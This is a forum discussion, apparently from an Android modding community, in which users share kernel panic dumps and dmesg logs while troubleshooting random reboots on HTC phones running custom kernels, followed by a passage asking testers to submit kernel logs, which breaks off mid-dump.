[ 359.107910] 04cc c50f04c8 c50f04d0 c50f04d0 00000000 c6d5ede8 c6d5ede0 cb729144 cb9a88c4
[ 359.110412] 04ec cc5e99e0 cb987410 cb9a88d0 c03ca990 cb9a343c c6d70dfc 00000000 00000000
[ 359.112640] 050c 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 359.114685] 052c 00000157 00000007 00000033 2c419d66 00000033 2c419d66 00000002 00000000
[ 359.117126] 054c 00000000 00000000 00000000 00000000 00000000 c50f0560 c50f0560 c50f0568
[ 359.119598] 056c c50f0568 c50f0570 c50f0570 cbceb1a0 cbceb1a0 00000001 c50f0584 c50f0584
[ 359.121887] 058c 206b7453 20707041 76726553 00656369 00000000 00000000 00000000 00000000
[ 359.124145]
[ 359.124145] R9: 0xc02edad0:
[ 359.124816] dad0 0004624c 00057ff5 0006dd25 000899bc 000abe5d 000d5d21 0010c73e 0014ff97
[ 359.127136] daf0 001a3434 0020ea87 00295252 003351fe 00400000 004fec05 00640e12 007c97d9
[ 359.129608] db10 009aee73 00c3a13e 00f0f0f1 0130d190 017d05f4 01de5d6e 0253c825 02f14990
[ 359.132080] db30 03a83a84 04924924 05b05b05 071c71c7 08d3dcb0 0b21642c 0e38e38e 11111111
[ 359.134368] db50 c02ed8c8 c004b210 c004af90 c004ac44 c004aa18 c0049d48 c004a950 c0049d18
[ 359.136657] db70 c004a88c c004b24c 00000000 c0048720 c00486c0 c004a85c c02edb50 c004f868
[ 359.139160] db90 c004c630 c0048768 c00487c4 c0049960 c004c60c c00488a4 c004c508 00000000
[ 359.141632] dbb0 00000000 c0048804 c004884c 00000000 54445352 00585a74 00000000 00000000
[ 359.143920] Process Stk App Service (pid: 292, stack limit = 0xc5030260)
[ 359.144378] Stack: (0xc5031d20 to 0xc5032000)
[ 359.144622] 1d20: cb9a86d0 c03ee198 cb9a86d0 00000001 c5031d5c c5031d40 c0049bd4 c0189d08
[ 359.147094] 1d40: c03ee198 cb9a86d0 00000000 000003f8 c5031d7c c5031d60 c0049dd8 c0049be4
[ 359.149353] 1d60: c50f02c0 c03ee160 c5030000 000003f8 c5031dc4 c5031d80 c02e92bc c0049d54
[ 359.151824] 1d80: 002ec000 00000000 c5031dc4 c50f052c c5031e40 00000000 c5031e60 00000000
[ 359.154113] 1da0: c5031e4c c5030000 00000000 c5031e60 c041d7a0 002ec86c c5031ebc c5031dc8
[ 359.156616] 1dc0: c007596c c02e9138 c004ad40 c004a654 c50f02f0 c5031e54 ffffffff 00000001
[ 359.159088] 1de0: c03ee198 cb9a86d8 c2a452ea 00000001 c5031e14 c5031e00 c5030000 c50f02c0
[ 359.161560] 1e00: 00000015 000003f8 c50f052c cb9a86a0 c5031e3c c5031e20 c006e1fc c006dbbc
[ 359.163848] 1e20: 00000000 000003f8 cb9f001c c50f02c0 c5031e54 c5031e40 c006e248 c006e1d4
[ 359.166107] 1e40: 00000064 c041d7a0 c041d7a0 c041d7a8 c041d7a8 c5031e84 c5031e84 c041d7a0
[ 359.168609] 1e60: 002ec000 cb614820 0000086e 00000000 c50f02c0 ffffffff 00000000 c50f02c0
[ 359.171112] 1e80: c004bd80 c5031e54 c5031e54 ffffffff c5031ebc 00000000 002ec86c 002ec868
[ 359.173400] 1ea0: 000000f0 c0025f24 ffffffff 00000001 c5031f44 c5031ec0 c00771ac c007570c
[ 359.175872] 1ec0: ffffffff 00000000 c5031f4c c50f05e0 c023190c 45a4fd60 c0186201 c0025f24
[ 359.178344] 1ee0: c5030000 42638f08 c5031f14 c5031ef8 c00c0998 c0231918 45a4fd60 cb7eaaa0
[ 359.180633] 1f00: c0186201 00000014 c5031f7c c5031f18 c00c1004 c00c0970 ffffffff 00000000
[ 359.183105] 1f20: 00000000 00000000 000000f0 c0025f24 c5030000 002ec86c c5031fa4 c5031f48
[ 359.185607] 1f40: c0077c80 c0077110 002ec868 00000000 ffffffff c0057744 cb7eaaa0 ffffffff
[ 359.188049] 1f60: c0186201 00000014 c0025f24 c5030000 c5031fa4 002ec868 002ec86c 002ec868
[ 359.190368] 1f80: 002ec86c 00000000 000000f0 c0025f24 c5030000 42638ed4 00000000 c5031fa8
[ 359.192840] 1fa0: c0025da0 c0077b54 002ec868 002ec86c 002ec86c 00000000 ffffffff 00000000
[ 359.195343] 1fc0: 002ec868 002ec86c 00000000 000000f0 ad00f380 002ebf20 42638ed4 002ebf20
[ 359.197875] 1fe0: ad080248 45a4fd08 afe0f5d4 afe0dc44 60000010 002ec86c 00000000 00000000
[ 359.200164] Backtrace:
[ 359.200836] [<c0189cfc>] (rb_erase+0x0/0x360) from [<c0049bd4>] (__dequeue_entity+0x38/0x3c)
[ 359.201812] r7:00000001 r6:cb9a86d0 r5:c03ee198 r4:cb9a86d0
[ 359.203155] [<c0049bd8>] (set_next_entity+0x0/0x140) from [<c0049dd8>] (pick_next_task_fair+0x90/0xa4)
[ 359.204315] r7:000003f8 r6:00000000 r5:cb9a86d0 r4:c03ee198
[ 359.205474] [<c0049d48>] (pick_next_task_fair+0x0/0xa4) from [<c02e92bc>] (schedule+0x190/0x444)
[ 359.206634] r7:000003f8 r6:c5030000 r5:c03ee160 r4:c50f02c0
[ 359.207763] [<c02e912c>] (schedule+0x0/0x444) from [<c007596c>] (futex_wait+0x26c/0x510)
[ 359.208923] [<c0075700>] (futex_wait+0x0/0x510) from [<c00771ac>] (do_futex+0xa8/0xa44)
[ 359.210083] [<c0077104>] (do_futex+0x0/0xa44) from [<c0077c80>] (sys_futex+0x138/0x14c)
[ 359.211212] [<c0077b48>] (sys_futex+0x0/0x14c) from [<c0025da0>] (ret_fast_syscall+0x0/0x2c)
[ 359.212188] Code: 15813000 ea00000e e3520000 e5904000 (15923000)
[ 359.214141] Kernel panic - not syncing: Fatal exception
[ 359.214508] apanic_writeflashpage: No panic_write available
[ 359.214965] apanic: Flash write failed (0)
Here's another:
Code:
[ 106.688842] Freezing user space processes ... <1>Unable to handle kernel paging request at virtual address 41b881d8
[ 106.699829] pgd = c530c000
[ 106.700286] [41b881d8] *pgd=1e513031, *pte=00000000, *ppte=00000000
[ 106.701202] Internal error: Oops: 817 [#1] PREEMPT
[ 106.701660] Modules linked in: wlan ramzswap
[ 106.702575] CPU: 0 Not tainted (2.6.29.6-cm42 #2)
[ 106.702850] PC is at set_next_entity+0xb4/0x140
[ 106.703308] LR is at pick_next_task_fair+0x90/0xa4
[ 106.703552] pc : [<c0049c8c>] lr : [<c0049dd8>] psr: 20000093
[ 106.703582] sp : c534be18 ip : 00000000 fp : c534be34
[ 106.704254] r10: 00000000 r9 : c02edb50 r8 : c6f9246c
[ 106.704681] r7 : 00000000 r6 : 69ef2e6c r5 : cba190e0 r4 : 41b88170
[ 106.704925] r3 : 6b55bd8f r2 : 11983e9c r1 : 00000000 r0 : 00000000
[ 106.705383] Flags: nzCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment user
[ 106.705841] Control: 00c5387d Table: 1e50c008 DAC: 00000015
[ 106.706085]
[ 106.706085] PC: 0xc0049c0c:
[ 106.706542] 9c0c e591105c e5940058 e0522006 e0c33007 e1510003 e1a0c003 8a000002 1a000003
[ 106.709045] 9c2c e1500002 9a000001 e1a02000 e1a0c001 e1c406d0 e5842058 e3a02001 e0900002
[ 106.711547] 9c4c e3a03000 e0a11003 e584c05c e1c406f0 e5952044 e3a03ffe e0822003 e1c466d8
[ 106.714019] 9c6c e1c220d0 e1c405d0 e0922006 e0a33007 e0522000 e0c33001 e3a00000 e3a01000
[ 106.716278] 9c8c e1c426f8 e1c405f0 e1a00005 e1a01004 ebffffbe e5952044 e3a03ffe e0822003
[ 106.718566] 9cac e1c220d0 e1c422f0 e5953044 e5854034 e5942000 e5933024 e1530082 3a00000f
[ 106.721069] 9ccc e1c422d8 e1c463d8 e59400a4 e594c0a0 e0522006 e0c33007 e1500003 e1a01003
[ 106.723541] 9cec 8a000002 1a000003 e15c0002 9a000001 e1a0200c e1a01000 e58420a0 e58410a4
[ 106.725830]
[ 106.725830] LR: 0xc0049d58:
[ 106.726470] 9d58 e3550000 01a00005 089da8f0 e2804038 e3a06000 e5945024 e5940038 e3550000
[ 106.728759] 9d78 12455008 e3500000 0a000004 e1a01005 ebfffe4b e3500000 d5945038 da000006
[ 106.731048] 9d98 e594003c e3500000 0a000003 e1a01005 ebfffe43 e3500000 d594503c e594303c
[ 106.733551] 9db8 e1a00004 e1530005 e5943038 0584603c e1530005 05846038 e1a01005 ebffff7f
[ 106.736022] 9dd8 e5954130 e3540000 1affffe1 e2450030 e89da8f0 e1a0c00d e92ddbf0 e24cb004
[ 106.738281] 9df8 e1c081d8 e1c143d0 e1a03000 e280c020 e0544008 e0c55009 e3a00001 e3a0e000
[ 106.740753] 9e18 ea00000b e1c262d8 e282c008 e0566008 e0c77009 e1570005 ca000004 1a000001
[ 106.743225] 9e38 e1560004 8a000001 e282c004 e3a00000 e1a0e002 e59c2000 e3520000 1afffff0
[ 106.745544]
[ 106.745544] SP: 0xc534bd98:
[ 106.746185] bd98 ff67e0b8 ffffffff c534be4c c6f92230 cba190e0 00000001 ffffffff c534be04
[ 106.748687] bdb8 69ef2e6c 00000000 c534be34 c534bdd0 c00259ac c0025200 00000000 00000000
[ 106.750976] bdd8 11983e9c 6b55bd8f 41b88170 cba190e0 69ef2e6c 00000000 c6f9246c c02edb50
[ 106.753479] bdf8 00000000 c534be34 00000000 c534be18 c0049dd8 c0049c8c 20000093 ffffffff
[ 106.755950] be18 cba190e0 c7058170 00000000 000003f8 c534be54 c534be38 c0049dd8 c0049be4
[ 106.758209] be38 c6f92200 c03ee160 c534a000 000003f8 c534be9c c534be58 c02e92bc c0049d54
[ 106.760681] be58 d56ac5a1 00000018 ad080000 c6f9246c d56ac5a1 00000018 c6f92200 c534a000
[ 106.763153] be78 00000000 00000002 000000f0 c0025f24 c534a000 10000000 c534bebc c534bea0
[ 106.765655]
[ 106.765655] FP: 0xc534bdb4:
[ 106.766113] bdb4 c534be04 69ef2e6c 00000000 c534be34 c534bdd0 c00259ac c0025200 00000000
[ 106.768585] bdd4 00000000 11983e9c 6b55bd8f 41b88170 cba190e0 69ef2e6c 00000000 c6f9246c
[ 106.770874] bdf4 c02edb50 00000000 c534be34 00000000 c534be18 c0049dd8 c0049c8c 20000093
[ 106.773376] be14 ffffffff cba190e0 c7058170 00000000 000003f8 c534be54 c534be38 c0049dd8
[ 106.775878] be34 c0049be4 c6f92200 c03ee160 c534a000 000003f8 c534be9c c534be58 c02e92bc
[ 106.778381] be54 c0049d54 d56ac5a1 00000018 ad080000 c6f9246c d56ac5a1 00000018 c6f92200
[ 106.780639] be74 c534a000 00000000 00000002 000000f0 c0025f24 c534a000 10000000 c534bebc
[ 106.783142] be94 c534bea0 c006ff68 c02e9138 c534bfb0 c0025f24 00000000 000000f0 c534bf9c
[ 106.785430]
[ 106.785430] R5: 0xcba19060:
[ 106.785858] 9060 0000000a 0000000b 0000000c 0000000d 0000000e 0000000f 00000010 00000011
[ 106.788330] 9080 00000012 00000013 00000014 00000015 00000016 00000017 00000018 00000019
[ 106.790802] 90a0 0000001a 0000001b 0000001c 0000001d 0000001e 0000001f 00000020 00000021
[ 106.793060] 90c0 00000022 00000023 00000024 00000025 00000026 00000027 ffffffff 00000000
[ 106.795562] 90e0 00009000 00000000 00000024 00000000 e619afda 00000000 490f6bef 00000003
[ 106.797821] 9100 c6fcccd8 c7058178 c5309064 c6ee94a4 00000000 00000000 00000000 00000000
[ 106.800323] 9120 00000804 c03ee160 cba19188 c03ee538 cba20560 00000000 00000000 00000000
[ 106.802581] 9140 00000000 00000000 00000000 00000000 00000000 00000000 fff00000 ffffffff
[ 106.805053]
[ 106.805084] R8: 0xc6f923ec:
[ 106.805511] 23ec cbcfa280 cbcfa280 c6f923f4 c6f923f4 c530869c c53031fc c5303000 c6f92408
[ 106.808013] 240c c6f92408 c6f92410 c6f92410 00000000 c6f5a6a8 c6f5a6a0 c505c624 cc5e9a6c
[ 106.810302] 242c cc5e9a60 c505c630 c03ca9a0 c03ca990 c53086dc c530323c 00000000 00000000
[ 106.812774] 244c 00000000 00000003 00000000 00000003 00000000 00000000 00000000 00000000
[ 106.815063] 246c 00000011 0000000e 00000039 01442d0f 00000039 01442d0f 000003cf 00000000
[ 106.817535] 248c 00000000 00000000 00000000 00000000 00000000 c6f924a0 c6f924a0 c6f924a8
[ 106.820037] 24ac c6f924a8 c6f924b0 c6f924b0 cc5ed8a0 cc5ed8a0 00000001 c6f924c4 c6f924c4
[ 106.822326] 24cc 70616548 6b726f57 00007265 00000000 00000000 00000001 00000000 00000000
[ 106.824829]
[ 106.824829] R9: 0xc02edad0:
[ 106.825469] dad0 0004624c 00057ff5 0006dd25 000899bc 000abe5d 000d5d21 0010c73e 0014ff97
[ 106.827758] daf0 001a3434 0020ea87 00295252 003351fe 00400000 004fec05 00640e12 007c97d9
[ 106.830230] db10 009aee73 00c3a13e 00f0f0f1 0130d190 017d05f4 01de5d6e 0253c825 02f14990
[ 106.832702] db30 03a83a84 04924924 05b05b05 071c71c7 08d3dcb0 0b21642c 0e38e38e 11111111
[ 106.835021] db50 c02ed8c8 c004b210 c004af90 c004ac44 c004aa18 c0049d48 c004a950 c0049d18
[ 106.837493] db70 c004a88c c004b24c 00000000 c0048720 c00486c0 c004a85c c02edb50 c004f868
[ 106.839965] db90 c004c630 c0048768 c00487c4 c0049960 c004c60c c00488a4 c004c508 00000000
[ 106.842468] dbb0 00000000 c0048804 c004884c 00000000 54445352 00585a74 00000000 00000000
[ 106.844726] Process HeapWorker (pid: 331, stack limit = 0xc534a260)
[ 106.845184] Stack: (0xc534be18 to 0xc534c000)
[ 106.845428] be00: cba190e0 c7058170
[ 106.847686] be20: 00000000 000003f8 c534be54 c534be38 c0049dd8 c0049be4 c6f92200 c03ee160
[ 106.850189] be40: c534a000 000003f8 c534be9c c534be58 c02e92bc c0049d54 d56ac5a1 00000018
[ 106.852539] be60: ad080000 c6f9246c d56ac5a1 00000018 c6f92200 c534a000 00000000 00000002
[ 106.855041] be80: 000000f0 c0025f24 c534a000 10000000 c534bebc c534bea0 c006ff68 c02e9138
[ 106.857513] bea0: c534bfb0 c0025f24 00000000 000000f0 c534bf9c c534bec0 c002828c c006fe48
[ 106.860015] bec0: ffffffff 00000000 c534bf4c c6f92520 c00b3b18 c00e11ec 00000000 c02330dc
[ 106.862304] bee0: c009fe28 100ffe24 00000004 100ffe23 00000001 100ffe58 0000000b 00000000
[ 106.864807] bf00: c534bf1c c534bf10 c006d384 c018a5fc c534bfa4 c534bf20 c009ce90 00000000
[ 106.867248] bf20: 00000000 00000000 000000f0 c0025f24 c534a000 ad080fa8 c534bfa4 c534bf48
[ 106.869750] bf40: c0077c80 c0077110 ad080fa4 00000000 ffffffff 00000004 cba906a0 ffffffb7
[ 106.872039] bf60: c534bfa4 c534bf70 c00b3c00 c00b4a40 00000000 ad080fa4 ad080fa8 00000000
[ 106.874481] bf80: 000000f0 c0025f24 c534a000 10000000 c534bfac c534bfa0 c00287b8 c002824c
[ 106.876953] bfa0: 00000000 c534bfb0 c0025dec c0028794 ad080fa8 00000000 ffffffb7 00000000
[ 106.879455] bfc0: ad080fa4 ad080fa8 00000000 000000f0 00100000 ad041c25 10000000 00134738
[ 106.881713] bfe0: ad080248 100ffe38 afe0f5d4 afe0dc40 60000010 ad080fa8 00000000 00000000
[ 106.884216] Backtrace:
[ 106.884674] [<c0049bd8>] (set_next_entity+0x0/0x140) from [<c0049dd8>] (pick_next_task_fair+0x90/0xa4)
[ 106.885833] r7:000003f8 r6:00000000 r5:c7058170 r4:cba190e0
[ 106.887207] [<c0049d48>] (pick_next_task_fair+0x0/0xa4) from [<c02e92bc>] (schedule+0x190/0x444)
[ 106.888153] r7:000003f8 r6:c534a000 r5:c03ee160 r4:c6f92200
[ 106.889495] [<c02e912c>] (schedule+0x0/0x444) from [<c006ff68>] (refrigerator+0x12c/0x18c)
[ 106.890655] [<c006fe3c>] (refrigerator+0x0/0x18c) from [<c002828c>] (do_signal+0x4c/0x548)
[ 106.891601] r7:000000f0 r6:00000000 r5:c0025f24 r4:c534bfb0
[ 106.892974] [<c0028240>] (do_signal+0x0/0x548) from [<c00287b8>] (do_notify_resume+0x30/0x34)
[ 106.894104] [<c0028788>] (do_notify_resume+0x0/0x34) from [<c0025dec>] (work_pending+0x1c/0x20)
[ 106.895080] Code: e0522000 e0c33001 e3a00000 e3a01000 (e1c426f8)
[ 106.896850] Kernel panic - not syncing: Fatal exception
[ 106.897216] apanic_writeflashpage: No panic_write available
[ 106.897674] apanic: Flash write failed (0)
Not sure if it's related, but I also see this in the dmesg:
Code:
<6>[15014.889343] get_smem_clock: exit timeout state 10d29 clock 509296055 in 257 ticks
<6>[15014.914093] get_smem_clock: invalid start state 10d29 clock 509296055
<6>[15016.968231] get_smem_clock: exit timeout state 10d29 clock 509370592 in 257 ticks
<6>[15017.197174] get_smem_clock: invalid start state 10d29 clock 509370592
<6>[15019.866333] get_smem_clock: exit timeout state 10d29 clock 509459049 in 257 ticks
<6>[15019.877075] get_smem_clock: invalid start state 10d29 clock 509459049
<6>[15021.312255] get_smem_clock: exit timeout state 10d29 clock 509507224 in 257 ticks
<6>[15021.396606] get_smem_clock: invalid start state 10d29 clock 509507224
<6>[15022.048858] get_smem_clock: exit timeout state 10d29 clock 509535679 in 257 ticks
<6>[15022.216491] get_smem_clock: invalid start state 10d29 clock 509535679
<6>[15026.966278] get_smem_clock: exit timeout state 10d29 clock 509691696 in 257 ticks
<6>[15026.977020] get_smem_clock: invalid start state 10d29 clock 509691696
<6>[15026.982513] get_smem_clock: exit timeout state 10d29 clock 509692230 in 257 ticks
<6>[15026.993225] get_smem_clock: invalid start state 10d29 clock 509692230
Has anybody seen anything like this?
For reference, the phone is:
Sapphire PVT 32A ENG S-OFF H
HBOOT-1.33.2010 (SAPP10000)
CPLD-12
RADIO-3.22.20.17
I've used a couple of different SPLs and radios. Never makes any difference.
I hate to say this, but I've gone through 2 HTC Magics from Rogers and both were doing the random reboot, seemingly especially while the screen was off (sleep mode?) and getting a text or a phone call. The worst thing was that the last phone, which was a warranty replacement, wasn't even rooted yet but had the FACTORY IMAGE still.
Standard operator ROMs (with the HTC kernel) are fine.. so this isn't a problem like that.
I have the EXACT problem! How do I know which ROMs have an HTC kernel though?
I've done a lot of trial and error. I've tried so many ROMs, and it seemed that any custom kernel has these reboot problems.. and you can only get Android 1.5 ROMs with an HTC kernel.
You can find out your kernel version in Settings -> About Phone. It'll have 'htc' in there if it's an HTC kernel. On my G1, I've got 2.6.29-cm42 for a Cyanogen kernel, for example.
I've flashed the phone now with a generic carrier ROM, just so that it would be stable. Not happy about doing it.. but at least it works. I imagine that it'll never even see Android 1.6, because they'll never release it.

[Discussion] LEO Android Testing

The main problem in development is testing / feedback.
Of course developers test things themselves, but it seems not enough.
Commercial companies like HTC, Samsung, Motorola have special people who perform tests.
Our development is free, done as a hobby in our free time, so we need community support.
In most cases kernel logs can really help developers to improve and fix annoying bugs.
Without logs developers don't have a chance to detect the problem and fix it, so if u appear on IRC and say "hey, I got SOD 2 minutes ago" it's completely useless.
But if u say "hey, I got SOD while playing sound, here is my kernel log" it can be really useful.
Because developers can open this log and see something like this at the end:
Code:
[ 54.323889] kernel BUG at arch/arm/mach-msm/qdsp6_10/pcm_out.c:188!
[ 54.323918] Unable to handle kernel NULL pointer dereference at virtual address 00000000
[ 54.323940] pgd = c7bf4000
[ 54.323951] [00000000] *pgd=27a12031, *pte=00000000, *ppte=00000000
[ 54.323981] Internal error: Oops: 817 [#1] PREEMPT
[ 54.323996] last sysfs file: /sys/devices/system/cpu/cpu0/cpufreq/stats/time_in_state
[ 54.324013] Modules linked in:
[ 54.324034] CPU: 0 Not tainted (2.6.32.9-38066-g672726a-dirty #168)
[ 54.324078] PC is at __bug+0x20/0x2c
[ 54.324114] LR is at release_console_sem+0x1f4/0x208
[ 54.324132] pc : [<c006d7d0>] lr : [<c009cfd0>] psr: 60000013
[ 54.324141] sp : c6b51ed8 ip : c6b51e10 fp : c6b51ee4
[ 54.324159] r10: 0000b5d0 r9 : c6b50000 r8 : 00000000
[ 54.324174] r7 : 00000000 r6 : c579f440 r5 : c7bf89a0 r4 : c6b51f08
[ 54.324192] r3 : 00000000 r2 : 00000000 r1 : 0000a043 r0 : 0000004d
[ 54.324212] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[ 54.324231] Control: 10c5787d Table: 27bf4019 DAC: 00000015
[ 54.324246]
[ 54.324250] PC: 0xc006d750:
[ 54.324261] d750 e89da800 c03ca921 e1a0c00d e92dd800 e24cb004 e1a0c001 e1a03002 e1a01000
[ 54.324308] d770 e1a0200c e59f0004 eb0b7aea e89da800 c03ca938 e1a0c00d e92dd800 e24cb004
[ 54.324355] d790 e1a0c001 e1a03002 e1a01000 e1a0200c e59f0004 eb0b7adf e89da800 c03ca94f
[ 54.324401] d7b0 e1a0c00d e92dd800 e24cb004 e1a02001 e1a01000 e59f000c eb0b7ad6 e3a03000
[ 54.324447] d7d0 e5833000 eafffffe c03ca966 e1a0c00d e92dd800 e24cb004 e59f0004 e30012db
[ 54.324493] d7f0 ebffffee c03ca97f e1a0c00d e92dd800 e24cb004 e1a01000 e59f000c eb0b7ac5
[ 54.324539] d810 e59f0008 e30012bf ebffffe4 c03ca997 c03ca97f e1a0c00d e92dd800 e24cb004
[ 54.324585] d830 e59f000c eb0b7abb e59f0008 eb0b7ab9 e89da800 c03ca9b7 c03ca9ee e1a0c00d
[ 54.324632]
[ 54.324636] LR: 0xc009cf50:
[ 54.324647] cf50 ea000006 e1a00005 e59f3080 e1a05002 e8930006 e2422001 e1550006 1affffe4
[ 54.324693] cf70 e59f3068 e1a01006 e5932048 ebfffe5c e121f008 eaffffa3 e3a03000 e59f0044
[ 54.324739] cf90 e5823018 eb0068ad e121f008 e1a0200d e3c23d7f e3c3303f e5932004 e2422001
[ 54.324785] cfb0 e5832004 e5933000 e3130002 0a000000 eb0abec0 e35a0000 089dadf0 ebfffe9a
[ 54.324831] cfd0 e89dadf0 c0450c60 c0425bbc c03d1c11 c0425b80 e1a0c00d e92dd830 e24cb004
[ 54.324877] cff0 e59f4028 e5943000 e3530000 089da830 e3a0c000 e3a01001 e1a0300c e59f0010
[ 54.324923] d010 e1a02001 e584c000 ebffe70e e89da830 c0425be0 c0425b9c e1a0c00d e92dd800
[ 54.324969] d030 e24cb004 e1a0200d e3c23d7f e3c3303f e5933004 e3c3333f e3c330ff e3530000
[ 54.325016]
[ 54.325020] SP: 0xc6b51e58:
[ 54.325031] 1e58 5d393838 205b0020 34352020 3332332e 5d333538 ffffffff c6b51ec4 c579f440
[ 54.325077] 1e78 00000000 00000000 c6b51ee4 c6b51e90 c0069aac c00692d4 0000004d 0000a043
[ 54.325123] 1e98 00000000 00000000 c6b51f08 c7bf89a0 c579f440 00000000 00000000 c6b50000
[ 54.325167] 1eb8 0000b5d0 c6b51ee4 c6b51e10 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff
[ 54.325213] 1ed8 c6b51f3c c6b51ee8 c0087c4c c006d7bc 00000001 000012c0 0000b5d0 c579f470
[ 54.325259] 1ef8 0000003d 00000000 c7bf89a0 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920
[ 54.325305] 1f18 0000b5d0 c6b51f70 000012c0 000012c0 c6b50000 40207000 c6b51f6c c6b51f40
[ 54.325351] 1f38 c0107c2c c0087b40 297f5aac b46c40c0 40c61004 00000000 00000000 c572d920
[ 54.325398]
[ 54.325402] IP: 0xc6b51d90:
[ 54.325413] 1d90 c6b51e90 c7a09370 c6b51ddc c6b51da8 c006fc60 c006f9ec c6b51dd4 c6b51db8
[ 54.325459] 1db0 c027e8f4 c041fe1c c041fe8c 00000817 c6b51e90 00000000 20000113 0000b5d0
[ 54.325504] 1dd0 c6b51e8c c6b51de0 c0069304 c006fa68 0000a043 c6b50000 c6b51e0c c6b51df8
[ 54.325550] 1df0 c009c978 c009c88c c0425b80 0000a043 c6b51e34 c6b51e10 c009cfd0 c009ca48
[ 54.325596] 1e10 00000000 0000000c 00000036 c6b51e4e c0450d1b c6b51e5d c6b51eac c6b51e38
[ 54.325642] 1e30 c009d618 c009cde8 c6b51ebc 00000002 60000013 0000004d 00000000 205b0003
[ 54.325687] 1e50 34352020 3332332e 5d393838 205b0020 34352020 3332332e 5d333538 ffffffff
[ 54.325733] 1e70 c6b51ec4 c579f440 00000000 00000000 c6b51ee4 c6b51e90 c0069aac c00692d4
[ 54.325780]
[ 54.325784] FP: 0xc6b51e64:
[ 54.325795] 1e64 3332332e 5d333538 ffffffff c6b51ec4 c579f440 00000000 00000000 c6b51ee4
[ 54.325841] 1e84 c6b51e90 c0069aac c00692d4 0000004d 0000a043 00000000 00000000 c6b51f08
[ 54.325886] 1ea4 c7bf89a0 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4 c6b51e10
[ 54.325932] 1ec4 c6b51ed8 c009cfd0 c006d7d0 60000013 ffffffff c6b51f3c c6b51ee8 c0087c4c
[ 54.325978] 1ee4 c006d7bc 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000 c7bf89a0
[ 54.326023] 1f04 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70 000012c0
[ 54.326069] 1f24 000012c0 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40 297f5aac
[ 54.326115] 1f44 b46c40c0 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0 c6b51fa4
[ 54.326162]
[ 54.326166] R4: 0xc6b51e88:
[ 54.326178] 1e88 c0069aac c00692d4 0000004d 0000a043 00000000 00000000 c6b51f08 c7bf89a0
[ 54.326223] 1ea8 c579f440 00000000 00000000 c6b50000 0000b5d0 c6b51ee4 c6b51e10 c6b51ed8
[ 54.326268] 1ec8 c009cfd0 c006d7d0 60000013 ffffffff c6b51f3c c6b51ee8 c0087c4c c006d7bc
[ 54.326314] 1ee8 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000 c7bf89a0 c00b2728
[ 54.326360] 1f08 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70 000012c0 000012c0
[ 54.326406] 1f28 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40 297f5aac b46c40c0
[ 54.326452] 1f48 40c61004 00000000 00000000 c572d920 000012c0 0000b5d0 c6b51fa4 c6b51f70
[ 54.326497] 1f68 c0107d9c c0107b80 00000000 00000000 00000008 00000001 00000000 0000b450
[ 54.326543]
[ 54.326547] R5: 0xc7bf8920:
[ 54.326558] 8920 c7bf891c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326603] 8940 00000000 00000000 00000000 c0480380 c7bf8950 c7bf8950 00000000 c7bf895c
[ 54.326648] 8960 c7bf895c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326692] 8980 00000000 0000c350 0000c350 00000000 40406f00 00000000 00000000 00000000
[ 54.326737] 89a0 00000000 c6b50000 00000002 00400040 00000000 ffffffff 00000065 00000065
[ 54.326782] 89c0 00000065 00000000 c0350da8 00000000 0001184b 0000e9d0 00000001 00000000
[ 54.326827] 89e0 00000000 c0425628 c0425628 00000001 a5f3e77f 0000000c 011eaf1b 00000000
[ 54.326873] 8a00 06aabe75 00000005 011eaf1b 00000000 00000000 00000000 00001ad8 00000000
[ 54.326918]
[ 54.326922] R6: 0xc579f3c0:
[ 54.326933] f3c0 c579f3bc 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.326978] f3e0 000010c3 c579f3e4 c579f3e4 00000003 c7da4cd0 00000000 00000000 c7f1dc00
[ 54.327023] f400 c79ee5fc 00000001 00000000 00000000 00343f00 00349d70 00001fe5 c579f41c
[ 54.327069] f420 c579f41c 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327113] f440 250a4000 ffa06000 00001000 00001000 250a5000 ffa07000 00001000 000002c0
[ 54.327159] f460 00000000 00000000 00000000 00000001 c579f470 c579f470 c50d1000 00000000
[ 54.327205] f480 00000001 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327249] f4a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327294]
[ 54.327298] R9: 0xc6b4ff80:
[ 54.327309] ff80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327354] ffa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327398] ffc0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327441] ffe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327485] 0000 00000000 00000002 00000000 c7bf89a0 c0425ad0 00000000 00000035 c7c739b0
[ 54.327530] 0020 c7a09370 c7bf89a0 c7a2f620 c6b50000 c7bf8a38 c7bf8c50 c6b51e8c c6b51e48
[ 54.327576] 0040 c034c880 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327620] 0060 40306f00 00000000 00000000 00000000 00000000 00000000 00000000 00000000
[ 54.327669] Process Playback Thread (pid: 1216, stack limit = 0xc6b502f0)
[ 54.327687] Stack: (0xc6b51ed8 to 0xc6b52000)
[ 54.327704] 1ec0: c6b51f3c c6b51ee8
[ 54.327730] 1ee0: c0087c4c c006d7bc 00000001 000012c0 0000b5d0 c579f470 0000003d 00000000
[ 54.327755] 1f00: c7bf89a0 c00b2728 c6b51f08 c6b51f08 c0420340 c572d920 0000b5d0 c6b51f70
[ 54.327779] 1f20: 000012c0 000012c0 c6b50000 40207000 c6b51f6c c6b51f40 c0107c2c c0087b40
